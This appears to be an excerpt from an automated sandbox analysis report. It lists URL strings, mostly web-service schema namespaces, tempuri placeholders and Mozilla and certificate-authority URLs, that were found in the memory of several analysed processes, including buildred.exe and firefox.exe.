Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/D
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D85000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002D0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2896637347.0000026191F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: PharmaciesDetection.exe, 00000015.00000003.2676783589.00000000027B1000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: file.exe, file.exe, 00000000.00000002.2441623343.000000006C74D000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 00000028.00000002.2890262949.000002618F225000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2906777467.0000026192B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2914617240.00000261932BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2931107138.0000026194C54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2926539269.0000026194A80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.0000026190794000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F299000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2931107138.0000026194C24000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2945658971.000002640003F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2C0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2922562667.0000026194615000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2A3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2931107138.0000026194C12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2931107138.0000026194C61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F2B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 00000028.00000002.2906777467.0000026192B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2931107138.0000026194C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul8
Source: firefox.exe, 00000028.00000002.2931107138.0000026194C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulN&
Source: firefox.exe, 00000028.00000002.2931107138.0000026194CA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulP
Source: firefox.exe, 00000028.00000002.2931107138.0000026194C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulg
Source: file.exe, 00000000.00000002.2430601364.000000001CBA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2441439634.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
